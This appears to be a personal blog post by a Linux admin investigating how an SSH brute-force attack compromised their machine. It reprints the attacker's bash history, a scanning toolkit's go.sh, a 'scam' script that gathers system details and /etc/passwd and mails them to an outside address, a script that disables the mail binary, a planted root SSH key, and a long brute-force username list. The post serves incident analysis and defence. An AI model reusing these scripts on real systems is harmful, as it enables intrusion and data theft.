Shell Person Help me keep the shell people alive.

10Apr/1042

Hacked – SSH Bruteforce

This isn't much of a surprise, as the box had an incredibly simple root password. Here's some info:

This was a brute force ssh attack. ssh root login was not disabled. Here are some of early attempts before success:

cat /var/log/auth.log.1 | grep "Invalid user" | cut -d ':' -f 4 | sort | uniq | tail -n 25
Invalid user wilson from 64.124.102.44
Invalid user windows from 64.124.102.44
Invalid user worthy from 122.201.70.12
Invalid user www123 from 64.124.102.44
Invalid user www from 64.124.102.44
Invalid user www from 66.235.201.39
Invalid user www from 75.126.69.5
Invalid user wwwrun from 64.124.102.44
Invalid user xam from 64.124.102.44
Invalid user xbitchx from 64.124.102.44
Invalid user xchat from 64.124.102.44
Invalid user xfs123 from 64.124.102.44
Invalid user xfs from 64.124.102.44
Invalid user ydnah from 64.124.102.44
Invalid user yoshida123 from 64.124.102.44
Invalid user yoshida321 from 64.124.102.44
Invalid user yoshida from 64.124.102.44
Invalid user yssor from 64.124.102.44
Invalid user z1x2c3 from 64.124.102.44
Invalid user zabbix from 75.126.69.5
Invalid user zachary from 64.124.102.44
Invalid user zoe from 64.124.102.44
Invalid user zuperman from 64.124.102.44
Invalid user zxcvb from 64.124.102.44
Invalid user zxcvbn from 64.124.102.44

The full list is at the bottom of the post.

Once root access was gained, here's the commands they left in the .bash_history:

w
history | grep mount
mount -t ext4dev -o ro /dev/hda2 /mnt/karmic/
passwd
cd /var/tmp/.tmp
;s
ls
tar zxvf gosh.tar
cd gosh
chmod +x *
screen
./go.sh 211
ifconfig eth0:1 10.30.0.8 netmask 255.255.0.0
./go.sh 211
1

Here's what I can glean from them. First he checks who else is using the system, and how long it's been idle. Then, checks my mount history and mounts another linux partition (for Ubuntu Karmic). Then he changes my root password. I'm not sure why he did this - had he left it alone he would have had root access and I would have never known my system was compromised. Then he goes to a hidden .tmp directory and unzips gosh.tar, enters the directory, makes all files inside executable, and runs several commands. After he attempts to run go.sh, he then adds an alias for my ethernet card. I'm not sure what the purposes of this is. He then runs go.sh again. Afterwards he types "1", which is a file, but it's only a list of user names and passwords, presumably for a brute force attack. I find it notable that (1) it appears to be a person, and not a bot/script - thus the typo ";s" instead of "ls", and (2) the .bash_history was not erased. I'm not sure about the usage of "screen" - I'm assuming that screen logs commands in .bash_history, but maybe it does not. Also, I don't know if commands issued through ssh (without using a login shell) or sftp are logged in .bash history - that would explain how gosh.tar got on my system but is not mentioned in the .bash_history.

Here's a listing of the contents of /var/tmp/.tmp/gosh:

james@tv:/var/tmp/.tmp/gosh$ ls -l
total 4796
-rwxr-xr-x 1 root root 3346659 2006-07-23 04:47 1
-rwxr-xr-x 1 root root   54703 2008-04-20 10:04 2
-rwxr-xr-x 1 root root   28956 2008-04-20 17:19 3
-rwxr-xr-x 1 root root   54703 2008-04-20 10:04 4
-rwxr-xr-x 1 root root   26857 2005-08-23 04:16 5
-rwxr-xr-x 1 root root    1287 2009-02-10 05:02 a
-rwxr-xr-x 1 root root   22354 2004-12-01 19:31 common
-rwxr-xr-x 1 root root     265 2004-11-24 19:21 gen-pass.sh
-rwxr-xr-x 1 root root      94 2008-07-25 21:46 go.sh
-rwxr-xr-x 1 root root     449 2010-03-30 14:06 mfu.txt
-rwxr-xr-x 1 root root    1743 2009-07-30 03:49 pass_file
-rwxr-xr-x 1 root root   21407 2004-07-21 16:58 pscan2
-rwxr-xr-x 1 root root    6792 2009-02-10 05:03 scam
-rwxr-xr-x 1 root root     197 2005-08-23 05:30 secure
-rwxr-xr-x 1 root root  453972 2004-07-12 13:09 ss
-rwxr-xr-x 1 root root  842736 2004-11-24 08:34 ssh-scan
-rwxr-xr-x 1 root root       0 2006-09-26 11:27 vuln.txt

Here's go.sh:

./ss 22 -a $1 -i eth0 -s 10
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan 300
rm -f bios.txt

The files "1" through "5" are all lists of user names and passwords.

I'm not sure what mfu.txt is. It's clearly a list of IP addresses, but I don't know their significance.

james@tv:/var/tmp/.tmp/gosh$ cat mfu.txt
211.140.242.87
211.140.242.94
211.20.141.33
211.21.250.33
211.22.204.203
211.22.216.229
211.22.58.22
211.23.67.177
211.24.143.103
211.24.143.104
211.24.143.87
211.24.143.88
211.24.143.89
211.24.143.95
211.24.143.96
211.24.143.97
211.27.148.70
211.27.148.74
211.27.148.79
211.27.148.83
211.27.148.92
211.33.112.228
211.43.150.141
211.43.150.144
211.43.150.145
211.43.150.146
211.43.150.147
211.43.150.148
211.43.150.158
211.43.150.159
211.43.150.160

There are a few binaries in the gosh directory, and both "ss" and "ssh-scan" are called by "go.sh". One binary, "pscan2", appears to have a trojan.

james@tv:/var/tmp/.tmp/gosh$ clamscan .
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***  This version of the ClamAV engine is outdated.     ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./1: OK
./2: OK
./3: OK
./4: OK
./5: OK
./a: OK
./ss: OK
./scam: OK
./go.sh: OK
./pass_file: OK
./mfu.txt: OK
./common: OK
./ssh-scan: OK
./pscan2: Trojan.Linux.RST.b FOUND
./gen-pass.sh: OK
./secure: OK
./vuln.txt: Empty file

----------- SCAN SUMMARY -----------
Known viruses: 754683
Engine version: 0.95.3
Scanned directories: 1
Scanned files: 16
Infected files: 1
Data scanned: 7.73 MB
Data read: 4.62 MB (ratio 1.67:1)
Time: 2.999 sec (0 m 2 s)

One script, "scam", sends mail to the address "mafia89tm@yahoo.com". I'm not sure if this script was ever called. Here's part of it (it's long, and repetitive). Unfortunately, with the current formatting of this blog you lose the rad ASCII art, so I've included it here.

#!/bin/bash

echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu <img src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley"> )" mafia89tm@yahoo.com
rm -rf info2
clear

echo "####################################################################"
echo "#	                      ______                                  "
echo "# 	                   .-.      .-.                               "
echo "# 	                  /            \                              "
echo "# 	                 |     zRR      |                             "
echo "# 	                 |,  .-.  .-.  ,|                             "
echo "# 	                 | )(z_/  \z_)( |                             "
echo "# 	                 |/     /\     \|                             "
echo "# 	         _       (_     ^^     _)                             "
echo "# 	 _\ ____) \_______\__|IIIIII|__/_________________________     "
echo "# 	(_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\    "
echo "# 	  /     )_/        \          /                               "
echo "# 	                    \ ______ /  		                    "
echo "#                         SCANER PRIVAT                             "
echo "#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               "
echo "#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              "
echo "####################################################################"

if [ -f a ]; then
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16

Another script, "secure", appears to rename /usr/bin/mail. I assume this is to prevent alerting the administrator, but I'm not sure. I don't know if this script was ever called. Here's it is.

#!/bin/bash
if [ `whoami` == "root" ]; then
chmod -x /usr/bin/mail
mv /usr/bin/mail /usr/bin/s8
echo " Done , You can scan now "
else
echo -e " you're not root you're `whoami` with id `id` !! "
fi

I also noticed the existence of a new authorized_keys file in "/root/.ssh". I'm assuming this would give password-less login via ssh.

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext

Please feel free to add your own insight into this attack, or if you've experienced the same thing.

This is the full list of attempted brute force ssh attacks, before they gained access. (Click "show source" below to see the list - it was way too long and made commenting annoying).

 Invalid user 00000000 from 64.124.102.44
 Invalid user 0000000 from 64.124.102.44
 Invalid user 000000 from 64.124.102.44
 Invalid user 00000 from 64.124.102.44
 Invalid user 0000 from 64.124.102.44
 Invalid user 00089 from 64.124.102.44
 Invalid user 102938 from 64.124.102.44
 Invalid user 11111111 from 64.124.102.44
 Invalid user 1111111 from 64.124.102.44
 Invalid user 1234567890 from 64.124.102.44
 Invalid user 123456789 from 64.124.102.44
 Invalid user 12345678 from 64.124.102.44
 Invalid user 1234567 from 64.124.102.44
 Invalid user 123456 from 64.124.102.44
 Invalid user 12345 from 64.124.102.44
 Invalid user 1234 from 64.124.102.44
 Invalid user 1234qwer from 64.124.102.44
 Invalid user 123 from 64.124.102.44
 Invalid user 123root123 from 64.124.102.44
 Invalid user 123root321 from 64.124.102.44
 Invalid user 1qazxsw2 from 64.124.102.44
 Invalid user 1test from 64.124.102.44
 Invalid user 22222222 from 64.124.102.44
 Invalid user 2222222 from 64.124.102.44
 Invalid user 222222 from 64.124.102.44
 Invalid user 22222 from 64.124.102.44
 Invalid user 2222 from 64.124.102.44
 Invalid user 321 from 64.124.102.44
 Invalid user 33333333 from 64.124.102.44
 Invalid user 3333333 from 64.124.102.44
 Invalid user 333333 from 64.124.102.44
 Invalid user 33333 from 64.124.102.44
 Invalid user 3333 from 64.124.102.44
 Invalid user 333 from 64.124.102.44
 Invalid user 44444444 from 64.124.102.44
 Invalid user 4444444 from 64.124.102.44
 Invalid user 444444 from 64.124.102.44
 Invalid user 54321 from 64.124.102.44
 Invalid user 55555555 from 64.124.102.44
 Invalid user 5555555 from 64.124.102.44
 Invalid user 555555 from 64.124.102.44
 Invalid user 66666666 from 64.124.102.44
 Invalid user 6666666 from 64.124.102.44
 Invalid user 666666 from 64.124.102.44
 Invalid user 77777777 from 64.124.102.44
 Invalid user 7777777 from 64.124.102.44
 Invalid user 777777 from 64.124.102.44
 Invalid user 88888888 from 64.124.102.44
 Invalid user 8888888 from 64.124.102.44
 Invalid user 888888 from 64.124.102.44
 Invalid user 99999999 from 64.124.102.44
 Invalid user 9999999 from 64.124.102.44
 Invalid user 999999 from 64.124.102.44
 Invalid user ab1cd2ef3 from 64.124.102.44
 Invalid user abcde from 64.124.102.44
 Invalid user abcd from 64.124.102.44
 Invalid user abc from 64.124.102.44
 Invalid user abuse from 64.124.102.44
 Invalid user account from 64.124.102.44
 Invalid user adam123 from 64.124.102.44
 Invalid user adam321 from 64.124.102.44
 Invalid user adam from 64.124.102.44
 Invalid user addela from 122.201.70.12
 Invalid user adela from 122.201.70.12
 Invalid user adi123 from 64.124.102.44
 Invalid user adm123 from 64.124.102.44
 Invalid user admadm from 64.124.102.44
 Invalid user adm from 64.124.102.44
 Invalid user admin01 from 64.124.102.44
 Invalid user admin02 from 64.124.102.44
 Invalid user admin12345 from 64.124.102.44
 Invalid user admin123 from 64.124.102.44
 Invalid user admin1 from 64.124.102.44
 Invalid user admin2 from 64.124.102.44
 Invalid user admin321 from 64.124.102.44
 Invalid user admin from 202.120.143.187
 Invalid user admin from 64.124.102.44
 Invalid user administrator from 64.124.102.44
 Invalid user adminroot from 64.124.102.44
 Invalid user adminweb from 64.124.102.44
 Invalid user adonis from 64.124.102.44
 Invalid user adrian123 from 64.124.102.44
 Invalid user adrian1 from 122.201.70.12
 Invalid user adrian321 from 64.124.102.44
 Invalid user adrian from 122.201.70.12
 Invalid user adrian from 64.124.102.44
 Invalid user a from 64.124.102.44
 Invalid user agent from 64.124.102.44
 Invalid user agostino from 64.124.102.44
 Invalid user ahile from 64.124.102.44
 Invalid user ajith from 213.197.182.48
 Invalid user akihisa from 213.197.182.48
 Invalid user akino from 213.197.182.48
 Invalid user akira from 213.197.182.48
 Invalid user alan from 64.124.102.44
 Invalid user albert123 from 64.124.102.44
 Invalid user albert321 from 64.124.102.44
 Invalid user albert from 64.124.102.44
 Invalid user aleb from 64.124.102.44
 Invalid user alex123 from 64.124.102.44
 Invalid user alex321 from 64.124.102.44
 Invalid user alexander from 64.124.102.44
 Invalid user alexandre from 64.124.102.44
 Invalid user alex from 64.124.102.44
 Invalid user alias123 from 64.124.102.44
 Invalid user alias from 64.124.102.44
 Invalid user alice from 64.124.102.44
 Invalid user alido from 122.201.70.12
 Invalid user alien from 122.201.70.12
 Invalid user alin123 from 64.124.102.44
 Invalid user alina123 from 64.124.102.44
 Invalid user alina321 from 64.124.102.44
 Invalid user alina from 64.124.102.44
 Invalid user almacen123 from 64.124.102.44
 Invalid user almacen from 64.124.102.44
 Invalid user alumno from 64.124.102.44
 Invalid user amanda from 64.124.102.44
 Invalid user amazon123 from 64.124.102.44
 Invalid user amazon321 from 64.124.102.44
 Invalid user amazon from 64.124.102.44
 Invalid user amundo from 64.124.102.44
 Invalid user anastasia from 64.124.102.44
 Invalid user ancd from 64.124.102.44
 Invalid user anderson from 64.124.102.44
 Invalid user andreea from 122.201.70.12
 Invalid user andrei from 64.124.102.44
 Invalid user andrew123 from 64.124.102.44
 Invalid user andrew321 from 64.124.102.44
 Invalid user andrew from 64.124.102.44
 Invalid user andy123 from 64.124.102.44
 Invalid user andy321 from 64.124.102.44
 Invalid user andy from 64.124.102.44
 Invalid user anelise from 122.201.70.12
 Invalid user angela from 64.124.102.44
 Invalid user angel from 64.124.102.44
 Invalid user angelofdeath from 64.124.102.44
 Invalid user anthony123 from 64.124.102.44
 Invalid user anthony321 from 64.124.102.44
 Invalid user anthony from 64.124.102.44
 Invalid user antoneta from 122.201.70.12
 Invalid user antonio from 64.124.102.44
 Invalid user apache from 64.124.102.44
 Invalid user apolo from 64.124.102.44
 Invalid user april from 64.124.102.44
 Invalid user arcer from 64.124.102.44
 Invalid user aron123 from 64.124.102.44
 Invalid user aron321 from 64.124.102.44
 Invalid user aron from 64.124.102.44
 Invalid user arthur from 64.124.102.44
 Invalid user asdfg from 64.124.102.44
 Invalid user aslkdfjh from 64.124.102.44
 Invalid user atria from 213.197.182.48
 Invalid user atsumi from 213.197.182.48
 Invalid user aurelia from 64.124.102.44
 Invalid user aurelio from 64.124.102.44
 Invalid user austin from 122.201.70.12
 Invalid user austin from 64.124.102.44
 Invalid user azuma from 213.197.182.48
 Invalid user baba from 213.197.182.48
 Invalid user backuppc from 75.126.69.5
 Invalid user baker from 122.201.70.12
 Invalid user baltazar from 64.124.102.44
 Invalid user balykin from 213.197.182.48
 Invalid user bank from 64.124.102.44
 Invalid user banking from 64.124.102.44
 Invalid user bartolomeu from 64.124.102.44
 Invalid user bascketball from 64.124.102.44
 Invalid user bash123 from 64.124.102.44
 Invalid user bash321 from 64.124.102.44
 Invalid user bashbash from 64.124.102.44
 Invalid user bash from 64.124.102.44
 Invalid user basil from 64.124.102.44
 Invalid user beatrice from 64.124.102.44
 Invalid user bela123 from 64.124.102.44
 Invalid user bela321 from 64.124.102.44
 Invalid user belabela from 64.124.102.44
 Invalid user bela from 64.124.102.44
 Invalid user bella from 64.124.102.44
 Invalid user ben123 from 64.124.102.44
 Invalid user ben321 from 64.124.102.44
 Invalid user benahmed123 from 64.124.102.44
 Invalid user benahmed321 from 64.124.102.44
 Invalid user benahmed from 64.124.102.44
 Invalid user ben from 64.124.102.44
 Invalid user bernard123 from 64.124.102.44
 Invalid user bernard321 from 64.124.102.44
 Invalid user bernard from 64.124.102.44
 Invalid user bessel from 213.197.182.48
 Invalid user best from 64.124.102.44
 Invalid user bestrella123 from 64.124.102.44
 Invalid user bestrella321 from 64.124.102.44
 Invalid user bestrella from 64.124.102.44
 Invalid user bianca123 from 64.124.102.44
 Invalid user bianca321 from 64.124.102.44
 Invalid user bianca from 64.124.102.44
 Invalid user bill123 from 64.124.102.44
 Invalid user bill from 64.124.102.44
 Invalid user bisson from 213.197.182.48
 Invalid user bitchx from 64.124.102.44
 Invalid user black from 64.124.102.44
 Invalid user blackhat from 64.124.102.44
 Invalid user blue from 64.124.102.44
 Invalid user bob from 213.197.182.48
 Invalid user boss from 64.124.102.44
 Invalid user brand from 64.124.102.44
 Invalid user brandon from 64.124.102.44
 Invalid user brandy from 122.201.70.12
 Invalid user bran from 64.124.102.44
 Invalid user bret from 64.124.102.44
 Invalid user brett123 from 64.124.102.44
 Invalid user brett321 from 64.124.102.44
 Invalid user brett from 64.124.102.44
 Invalid user british123 from 64.124.102.44
 Invalid user british from 64.124.102.44
 Invalid user bruce from 64.124.102.44
 Invalid user bryan123 from 64.124.102.44
 Invalid user bryan321 from 64.124.102.44
 Invalid user bryan from 64.124.102.44
 Invalid user business from 122.201.70.12
 Invalid user bwadmin from 75.126.69.5
 Invalid user calendar from 64.124.102.44
 Invalid user calvin from 64.124.102.44
 Invalid user camilio from 64.124.102.44
 Invalid user camilo from 64.124.102.44
 Invalid user canada from 64.124.102.44
 Invalid user career from 64.124.102.44
 Invalid user carina from 64.124.102.44
 Invalid user carla from 64.124.102.44
 Invalid user carlo123 from 64.124.102.44
 Invalid user carlo321 from 64.124.102.44
 Invalid user carlo from 64.124.102.44
 Invalid user carlos123 from 64.124.102.44
 Invalid user carlos321 from 64.124.102.44
 Invalid user carlos from 64.124.102.44
 Invalid user carmen123 from 64.124.102.44
 Invalid user carmen321 from 64.124.102.44
 Invalid user carmen from 64.124.102.44
 Invalid user carol123 from 64.124.102.44
 Invalid user carol from 64.124.102.44
 Invalid user carolina from 122.201.70.12
 Invalid user cash from 64.124.102.44
 Invalid user ceimail from 64.124.102.44
 Invalid user celia from 64.124.102.44
 Invalid user cesar123 from 64.124.102.44
 Invalid user cesar from 64.124.102.44
 Invalid user cezar from 64.124.102.44
 Invalid user cgi from 122.201.70.12
 Invalid user chad from 213.197.182.48
 Invalid user change from 64.124.102.44
 Invalid user changeme from 64.124.102.44
 Invalid user chat from 64.124.102.44
 Invalid user chkdu from 213.197.182.48
 Invalid user chris from 64.124.102.44
 Invalid user christopher\tchristopher from 64.124.102.44
 Invalid user chu from 122.201.70.12
 Invalid user cindy123 from 64.124.102.44
 Invalid user cindy321 from 64.124.102.44
 Invalid user cindy from 64.124.102.44
 Invalid user cisco from 75.126.69.5
 Invalid user clamav123 from 64.124.102.44
 Invalid user clamav321 from 64.124.102.44
 Invalid user clamav from 64.124.102.44
 Invalid user clamaw from 64.124.102.44
 Invalid user claudia from 64.124.102.44
 Invalid user claw from 64.124.102.44
 Invalid user client from 64.124.102.44
 Invalid user coach from 64.124.102.44
 Invalid user cocktail from 122.201.70.12
 Invalid user coco from 122.201.70.12
 Invalid user cod1 from 75.126.69.5
 Invalid user cod2 from 75.126.69.5
 Invalid user cod3 from 75.126.69.5
 Invalid user cod4 from 75.126.69.5
 Invalid user cod5 from 75.126.69.5
 Invalid user cod from 75.126.69.5
 Invalid user coe from 213.197.182.48
 Invalid user complainst from 64.124.102.44
 Invalid user concept123 from 64.124.102.44
 Invalid user concept from 64.124.102.44
 Invalid user contab from 64.124.102.44
 Invalid user contact from 64.124.102.44
 Invalid user content from 61.133.208.210
 Invalid user content from 64.124.102.44
 Invalid user corp from 64.124.102.44
 Invalid user cosmin from 122.201.70.12
 Invalid user cpanel123 from 64.124.102.44
 Invalid user cpanelcpanel from 64.124.102.44
 Invalid user cpanel from 64.124.102.44
 Invalid user cvs from 75.126.69.5
 Invalid user cyrus123 from 64.124.102.44
 Invalid user cyrus from 64.124.102.44
 Invalid user cyrus from 75.126.69.5
 Invalid user daemon123 from 64.124.102.44
 Invalid user daemondaemon from 64.124.102.44
 Invalid user damian from 64.124.102.44
 Invalid user damien from 64.124.102.44
 Invalid user dan123 from 64.124.102.44
 Invalid user dan321 from 64.124.102.44
 Invalid user dandan from 64.124.102.44
 Invalid user dan from 64.124.102.44
 Invalid user dangaard from 64.124.102.44
 Invalid user daniel123 from 64.124.102.44
 Invalid user daniel321 from 64.124.102.44
 Invalid user daniel from 64.124.102.44
 Invalid user danny123 from 64.124.102.44
 Invalid user danny from 64.124.102.44
 Invalid user danny from 64.27.6.176
 Invalid user dasusr1 from 75.126.69.5
 Invalid user database from 64.124.102.44
 Invalid user data from 64.124.102.44
 Invalid user data from 75.126.69.5
 Invalid user dave from 122.201.70.12
 Invalid user dave from 64.124.102.44
 Invalid user david123 from 64.124.102.44
 Invalid user david from 122.201.70.12
 Invalid user david from 64.124.102.44
 Invalid user david\tdavid from 64.124.102.44
 Invalid user db2inst1 from 75.126.69.5
 Invalid user db from 64.124.102.44
 Invalid user dbmaker from 64.124.102.44
 Invalid user deborah from 122.201.70.12
 Invalid user debra from 122.201.70.12
 Invalid user demo123 from 64.124.102.44
 Invalid user demo1 from 64.124.102.44
 Invalid user demodemo from 64.124.102.44
 Invalid user demo from 64.124.102.44
 Invalid user demo from 75.126.69.5
 Invalid user demouser from 64.124.102.44
 Invalid user denisa from 64.124.102.44
 Invalid user denis from 64.124.102.44
 Invalid user deven from 122.201.70.12
 Invalid user devon from 122.201.70.12
 Invalid user dexter from 64.124.102.44
 Invalid user diablo from 64.124.102.44
 Invalid user diala from 64.124.102.44
 Invalid user dibalo from 64.124.102.44
 Invalid user dima from 213.197.182.48
 Invalid user divin from 122.201.70.12
 Invalid user domin from 75.126.69.5
 Invalid user douglas from 64.124.102.44
 Invalid user download from 64.124.102.44
 Invalid user dragon from 64.124.102.44
 Invalid user Dragon from 64.124.102.44
 Invalid user dream from 75.126.69.5
 Invalid user drugs from 64.124.102.44
 Invalid user ebay from 64.124.102.44
 Invalid user edi from 64.124.102.44
 Invalid user edit from 64.124.102.44
 Invalid user edouard from 64.124.102.44
 Invalid user edward123 from 64.124.102.44
 Invalid user edward from 64.124.102.44
 Invalid user electra from 64.124.102.44
 Invalid user elis from 122.201.70.12
 Invalid user eliza from 64.124.102.44
 Invalid user ellen from 122.201.70.12
 Invalid user ema from 64.124.102.44
 Invalid user email from 64.124.102.44
 Invalid user emails from 64.124.102.44
 Invalid user emanuel from 64.124.102.44
 Invalid user emanuelle from 64.124.102.44
 Invalid user eminem from 64.124.102.44
 Invalid user encrypt from 64.124.102.44
 Invalid user eoor from 123.127.30.182
 Invalid user erian from 64.124.102.44
 Invalid user eric123 from 64.124.102.44
 Invalid user eric321 from 64.124.102.44
 Invalid user eric from 64.124.102.44
 Invalid user erika from 64.124.102.44
 Invalid user erik from 64.124.102.44
 Invalid user erin from 122.201.70.12
 Invalid user ernest from 64.124.102.44
 Invalid user eugen123 from 64.124.102.44
 Invalid user eugen321 from 64.124.102.44
 Invalid user eugen from 64.124.102.44
 Invalid user excalibur from 122.201.70.12
 Invalid user exchange from 64.124.102.44
 Invalid user fabio from 64.124.102.44
 Invalid user famille from 64.124.102.44
 Invalid user family from 64.124.102.44
 Invalid user fanthom from 122.201.70.12
 Invalid user faq from 64.124.102.44
 Invalid user fax123 from 64.124.102.44
 Invalid user faxadmin from 75.126.69.5
 Invalid user faxfax from 64.124.102.44
 Invalid user fax from 64.124.102.44
 Invalid user fax from 75.126.69.5
 Invalid user felicia from 64.124.102.44
 Invalid user felix from 64.124.102.44
 Invalid user fernando from 64.124.102.44
 Invalid user filip from 64.124.102.44
 Invalid user fin4lwish from 64.124.102.44
 Invalid user finalwish from 64.124.102.44
 Invalid user financ from 64.124.102.44
 Invalid user fire from 64.124.102.44
 Invalid user fluffy123 from 64.124.102.44
 Invalid user fluffy321 from 64.124.102.44
 Invalid user fluffy from 64.124.102.44
 Invalid user fox from 64.124.102.44
 Invalid user francisc from 64.124.102.44
 Invalid user francis from 64.124.102.44
 Invalid user francois from 64.124.102.44
 Invalid user frank123 from 64.124.102.44
 Invalid user frank321 from 64.124.102.44
 Invalid user frank from 64.124.102.44
 Invalid user frederic from 64.124.102.44
 Invalid user fred from 64.124.102.44
 Invalid user ftpadmin from 75.126.69.5
 Invalid user ftp from 64.124.102.44
 Invalid user ftp from 75.126.69.5
 Invalid user ftpin from 64.124.102.44
 Invalid user ftpout from 64.124.102.44
 Invalid user ftpuser from 75.126.69.5
 Invalid user ftpusr01 from 64.124.102.44
 Invalid user fucking from 64.124.102.44
 Invalid user gabi123 from 64.124.102.44
 Invalid user gabi321 from 64.124.102.44
 Invalid user gabi from 64.124.102.44
 Invalid user gabriel from 64.124.102.44
 Invalid user gabrielle from 64.124.102.44
 Invalid user game123 from 64.124.102.44
 Invalid user game from 64.124.102.44
 Invalid user gamegame from 64.124.102.44
 Invalid user games123 from 64.124.102.44
 Invalid user gary123 from 64.124.102.44
 Invalid user gary321 from 64.124.102.44
 Invalid user gary from 64.124.102.44
 Invalid user gen from 122.201.70.12
 Invalid user geo from 64.124.102.44
 Invalid user george from 64.124.102.44
 Invalid user geta from 64.124.102.44
 Invalid user giler from 122.201.70.12
 Invalid user giles from 122.201.70.12
 Invalid user giller from 122.201.70.12
 Invalid user gill from 122.201.70.12
 Invalid user gina from 64.124.102.44
 Invalid user ginger from 122.201.70.12
 Invalid user goba from 64.124.102.44
 Invalid user god from 64.124.102.44
 Invalid user golf from 64.124.102.44
 Invalid user gopher123 from 64.124.102.44
 Invalid user gopher from 64.124.102.44
 Invalid user gp from 64.124.102.44
 Invalid user guest123 from 64.124.102.44
 Invalid user guest from 75.126.69.5
 Invalid user gustavo from 64.124.102.44
 Invalid user handy from 64.124.102.44
 Invalid user harold from 64.124.102.44
 Invalid user harry from 64.124.102.44
 Invalid user hech from 64.124.102.44
 Invalid user hector from 64.124.102.44
 Invalid user helena123 from 64.124.102.44
 Invalid user helena from 64.124.102.44
 Invalid user helene from 64.124.102.44
 Invalid user helen from 64.124.102.44
 Invalid user hiphop from 64.124.102.44
 Invalid user hockey from 64.124.102.44
 Invalid user homebox from 64.124.102.44
 Invalid user home from 64.124.102.44
 Invalid user homer from 64.124.102.44
 Invalid user horus from 64.124.102.44
 Invalid user hotdog from 64.124.102.44
 Invalid user hp123 from 64.124.102.44
 Invalid user hp from 64.124.102.44
 Invalid user htt from 64.124.102.44
 Invalid user httpd from 64.124.102.44
 Invalid user http from 64.124.102.44
 Invalid user iacob from 64.124.102.44
 Invalid user ichael from 64.124.102.44
 Invalid user ident123 from 64.124.102.44
 Invalid user ident from 64.124.102.44
 Invalid user ihsystem from 66.235.201.39
 Invalid user image from 75.126.69.5
 Invalid user info123 from 64.124.102.44
 Invalid user info from 64.124.102.44
 Invalid user info from 75.126.69.5
 Invalid user informix from 64.124.102.44
 Invalid user informix from 75.126.69.5
 Invalid user ing from 122.201.70.12
 Invalid user ingresdb from 64.124.102.44
 Invalid user ingres from 64.124.102.44
 Invalid user install from 64.124.102.44
 Invalid user install from 75.126.69.5
 Invalid user internet from 64.124.102.44
 Invalid user invitado from 64.124.102.44
 Invalid user ircd from 64.124.102.44
 Invalid user isabel from 64.124.102.44
 Invalid user iulius from 122.201.70.12
 Invalid user jack123 from 64.124.102.44
 Invalid user jack from 64.124.102.44
 Invalid user jackjack from 64.124.102.44
 Invalid user jacob123 from 64.124.102.44
 Invalid user jacob321 from 64.124.102.44
 Invalid user jacob from 64.124.102.44
 Invalid user jacob from 75.126.69.5
 Invalid user jairo from 64.124.102.44
 Invalid user james123 from 64.124.102.44
 Invalid user james321 from 64.124.102.44
 Invalid user jane123 from 64.124.102.44
 Invalid user jane from 64.124.102.44
 Invalid user jan from 64.124.102.44
 Invalid user jay from 64.124.102.44
 Invalid user jean from 64.124.102.44
 Invalid user jen from 64.124.102.44
 Invalid user jenni from 64.124.102.44
 Invalid user jenny from 64.124.102.44
 Invalid user jf from 64.124.102.44
 Invalid user joana from 64.124.102.44
 Invalid user joe from 64.124.102.44
 Invalid user johan from 64.124.102.44
 Invalid user john123 from 64.124.102.44
 Invalid user john from 64.124.102.44
 Invalid user john from 64.27.6.176
 Invalid user johny from 64.124.102.44
 Invalid user jonathan from 64.124.102.44
 Invalid user jordan from 64.124.102.44
 Invalid user joseleno from 64.124.102.44
 Invalid user joseph from 64.124.102.44
 Invalid user joshua from 64.124.102.44
 Invalid user juan123 from 64.124.102.44
 Invalid user juan321 from 64.124.102.44
 Invalid user juan from 64.124.102.44
 Invalid user julian from 64.124.102.44
 Invalid user julien from 64.124.102.44
 Invalid user justin from 64.124.102.44
 Invalid user karim123 from 64.124.102.44
 Invalid user karim from 64.124.102.44
 Invalid user kelly123 from 64.124.102.44
 Invalid user kelly321 from 64.124.102.44
 Invalid user kelly from 64.124.102.44
 Invalid user kev from 64.124.102.44
 Invalid user kevin123 from 64.124.102.44
 Invalid user kevin321 from 64.124.102.44
 Invalid user kevin from 122.201.70.12
 Invalid user kevin from 64.124.102.44
 Invalid user king123 from 64.124.102.44
 Invalid user kiscica123 from 64.124.102.44
 Invalid user kiw from 122.201.70.12
 Invalid user kiwi from 122.201.70.12
 Invalid user kufew3 from 64.124.102.44
 Invalid user kurt from 64.124.102.44
 Invalid user kyle from 64.124.102.44
 Invalid user larisa from 64.124.102.44
 Invalid user larry123 from 64.124.102.44
 Invalid user larry321 from 64.124.102.44
 Invalid user larry from 64.124.102.44
 Invalid user laura from 64.124.102.44
 Invalid user leandro from 64.124.102.44
 Invalid user leo from 64.124.102.44
 Invalid user leon123 from 64.124.102.44
